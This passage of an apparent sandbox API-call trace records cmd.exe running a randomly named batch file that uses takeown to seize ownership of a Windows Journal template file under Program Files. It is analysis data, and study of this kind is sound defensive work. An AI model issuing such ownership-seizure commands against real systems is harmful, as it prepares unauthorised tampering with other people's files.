hHeap=0x460000, dwFlags=0x0, lpMem=0x460db8 | out: hHeap=0x460000) returned 1 [0231.132] DeleteProcThreadAttributeList (in: lpAttributeList=0x3de8e8 | out: lpAttributeList=0x3de8e8) [0231.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0231.132] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.132] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0231.133] SetConsoleInputExeNameW () returned 0x1 [0231.133] GetConsoleOutputCP () returned 0x1b5 [0231.133] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0231.133] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0231.134] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0231.134] _get_osfhandle (_FileHandle=3) returned 0x74 [0231.134] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474b60 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474a30 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474908 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4748a0 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4747c8 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4745b0 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474530 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474400 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4742d8 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474270 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741a0 | out: hHeap=0x460000) returned 1 [0231.134] GetProcessHeap () returned 0x460000 [0231.134] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461230 | out: hHeap=0x460000) returned 1 [0231.135] GetProcessHeap () returned 0x460000 [0231.135] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4611d0 | out: hHeap=0x460000) returned 1 [0231.135] _get_osfhandle (_FileHandle=3) returned 0x74 [0231.135] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0231.135] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0xc2, lpOverlapped=0x0) returned 1 [0231.135] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0231.135] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0231.136] _get_osfhandle (_FileHandle=3) returned 0x74 [0231.136] GetFileType (hFile=0x74) returned 0x1 [0231.136] _get_osfhandle (_FileHandle=3) returned 0x74 [0231.136] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0231.136] GetProcessHeap () returned 0x460000 [0231.136] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0231.136] GetProcessHeap () returned 0x460000 [0231.136] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0231.138] _tell (_FileHandle=3) returned 47 [0231.138] _close (_FileHandle=3) returned 0 [0231.138] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3deebc | out: _Buffer="\r\n") returned 2 [0231.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.138] GetFileType (hFile=0x7) returned 0x2 [0231.139] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee7c | out: lpMode=0x3dee7c) returned 1 [0231.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.139] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deea8*=0x2) returned 1 [0231.140] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0231.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0231.141] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3deeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0231.141] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3deeb8 | out: _Buffer=">") returned 1 [0231.141] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.141] GetFileType (hFile=0x7) returned 0x2 [0231.141] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.141] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee80 | out: lpMode=0x3dee80) returned 1 [0231.141] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.141] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3deeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3deeac*=0x26) returned 1 [0231.142] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.142] GetFileType (hFile=0x7) returned 0x2 [0231.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.142] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df104 | out: lpMode=0x3df104) returned 1 [0231.142] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.142] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x461238*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3df130, lpReserved=0x0 | out: lpBuffer=0x461238*, lpNumberOfCharsWritten=0x3df130*=0x7) returned 1 [0231.143] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df13c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\" ") returned 65 [0231.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.143] GetFileType (hFile=0x7) returned 0x2 [0231.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.143] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0231.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.144] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x41) returned 1 [0231.146] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df15c | out: _Buffer="\r\n") returned 2 [0231.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.146] GetFileType (hFile=0x7) returned 0x2 [0231.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df11c | out: lpMode=0x3df11c) returned 1 [0231.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df148*=0x2) returned 1 [0231.148] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0231.148] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0231.148] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0231.148] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0231.148] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0231.148] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0231.148] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0231.148] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0231.148] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0231.148] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0231.148] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0231.148] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0231.148] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0231.148] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0231.148] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0231.148] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0231.148] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0231.148] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0231.148] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0231.148] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0231.148] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0231.148] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0231.148] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0231.148] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0231.148] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0231.148] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0231.148] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0231.148] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0231.149] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0231.149] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0231.149] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0231.149] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0231.149] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0231.149] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0231.149] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0231.149] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0231.149] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0231.149] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0231.149] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0231.149] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0231.149] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0231.149] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0231.150] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474240, lpFilePart=0x3def00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3def00*="Desktop") returned 0x25 [0231.150] SetErrorMode (uMode=0x0) returned 0x1 [0231.150] GetProcessHeap () returned 0x460000 [0231.150] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474238, Size=0x64) returned 0x474238 [0231.150] GetProcessHeap () returned 0x460000 [0231.150] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474238) returned 0x64 [0231.150] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.150] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.150] GetProcessHeap () returned 0x460000 [0231.150] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x4742a8 [0231.150] GetProcessHeap () returned 0x460000 [0231.150] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4743d0 [0231.150] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.151] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3dec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dec7c) returned 0xffffffff [0231.151] GetLastError () returned 0x2 [0231.151] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x3dec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dec7c) returned 0xffffffff [0231.151] GetLastError () returned 0x2 [0231.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.152] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3dec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dec7c) returned 0x461250 [0231.152] FindClose (in: hFindFile=0x461250 | out: hFindFile=0x461250) returned 1 [0231.152] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x3dec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dec7c) returned 0xffffffff [0231.152] GetLastError () returned 0x2 [0231.152] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x3dec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dec7c) returned 0x461250 [0231.153] FindClose (in: hFindFile=0x461250 | out: hFindFile=0x461250) returned 1 [0231.153] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0231.153] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0231.153] GetConsoleTitleW (in: lpConsoleTitle=0x3deccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.153] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474d10, lpFilePart=0x3de7ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3de7ec*="Desktop") returned 0x25 [0231.153] SetErrorMode (uMode=0x0) returned 0x1 [0231.153] GetProcessHeap () returned 0x460000 [0231.153] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474d08, Size=0x64) returned 0x474d08 [0231.153] GetProcessHeap () returned 0x460000 [0231.153] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d08) returned 0x64 [0231.154] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.154] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.154] GetProcessHeap () returned 0x460000 [0231.154] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x474840 [0231.154] GetProcessHeap () returned 0x460000 [0231.154] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x474968 [0231.154] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.154] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3de568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de568) returned 0xffffffff [0231.154] GetLastError () returned 0x2 [0231.154] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x3de568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de568) returned 0xffffffff [0231.155] GetLastError () returned 0x2 [0231.155] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.155] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x3de568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de568) returned 0x461250 [0231.155] FindClose (in: hFindFile=0x461250 | out: hFindFile=0x461250) returned 1 [0231.155] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x3de568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de568) returned 0xffffffff [0231.156] GetLastError () returned 0x2 [0231.156] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x3de568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de568) returned 0x461250 [0231.156] FindClose (in: hFindFile=0x461250 | out: hFindFile=0x461250) returned 1 [0231.156] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0231.156] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0231.156] GetConsoleTitleW (in: lpConsoleTitle=0x3dea60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.156] InitializeProcThreadAttributeList (in: lpAttributeList=0x3de8e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3de9b0 | out: lpAttributeList=0x3de8e8, lpSize=0x3de9b0) returned 1 [0231.156] UpdateProcThreadAttribute (in: lpAttributeList=0x3de8e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x3de9a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3de8e8, lpPreviousValue=0x0) returned 1 [0231.156] GetStartupInfoW (in: lpStartupInfo=0x3de8a4 | out: lpStartupInfo=0x3de8a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0231.157] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0231.157] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3de944*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3de990 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", lpProcessInformation=0x3de990*(hProcess=0x78, hThread=0x74, dwProcessId=0x1c4, dwThreadId=0xacc)) returned 1 [0231.170] CloseHandle (hObject=0x74) returned 1 [0231.170] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0231.170] GetProcessHeap () returned 0x460000 [0231.170] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a8 | out: hHeap=0x460000) returned 1 [0231.170] GetEnvironmentStringsW () returned 0x475fc0* [0231.170] GetProcessHeap () returned 0x460000 [0231.170] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4781a8 [0231.170] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0231.170] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0233.644] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3de884 | out: lpExitCode=0x3de884*=0x0) returned 1 [0233.645] CloseHandle (hObject=0x78) returned 1 [0233.645] _vsnwprintf (in: _Buffer=0x3de9cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x3de890 | out: _Buffer="00000000") returned 8 [0233.645] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.645] GetProcessHeap () returned 0x460000 [0233.645] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a8 | out: hHeap=0x460000) returned 1 [0233.645] GetEnvironmentStringsW () returned 0x475fc0* [0233.645] GetProcessHeap () returned 0x460000 [0233.645] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4781a8 [0233.645] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0233.645] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.645] GetProcessHeap () returned 0x460000 [0233.645] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a8 | out: hHeap=0x460000) returned 1 [0233.645] GetEnvironmentStringsW () returned 0x475fc0* [0233.645] GetProcessHeap () returned 0x460000 [0233.645] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4781a8 [0233.645] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0233.645] GetProcessHeap () returned 0x460000 [0233.645] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460db8 | out: hHeap=0x460000) returned 1 [0233.645] DeleteProcThreadAttributeList (in: lpAttributeList=0x3de8e8 | out: lpAttributeList=0x3de8e8) [0233.645] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.646] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0233.646] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.646] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0233.647] SetConsoleInputExeNameW () returned 0x1 [0233.647] GetConsoleOutputCP () returned 0x1b5 [0233.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0233.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0233.648] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0233.648] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.648] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0233.648] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474a98 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474968 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474840 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d08 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474798 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474580 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474500 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4743d0 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4742a8 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474238 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741a0 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461230 | out: hHeap=0x460000) returned 1 [0233.649] GetProcessHeap () returned 0x460000 [0233.649] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4611d0 | out: hHeap=0x460000) returned 1 [0233.649] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.649] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0233.650] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0xb3, lpOverlapped=0x0) returned 1 [0233.650] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.650] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set 